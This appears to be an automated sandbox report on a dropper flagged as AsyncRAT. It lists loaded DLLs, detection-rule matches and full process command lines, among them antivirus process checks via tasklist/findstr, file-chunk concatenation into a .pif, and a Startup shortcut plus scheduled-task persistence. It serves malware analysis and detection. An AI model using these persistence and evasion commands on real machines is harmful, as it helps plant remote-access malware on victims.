Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wldp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Settings.cs Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Settings.cs Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Settings.cs Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Settings.cs Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Settings.cs Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@46/20@1/1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B41FA GetLastError,FormatMessageW, 11_2_004B41FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_004A2010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A1A0B AdjustTokenPrivileges,CloseHandle, 11_2_004A1A0B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404967
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 11_2_004ADD87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 11_2_004B3A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\0vyG14tDobaS6ejo
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe File created: C:\Users\user~1\AppData\Local\Temp\nskE4D4.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Virustotal: Detection: 21%
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
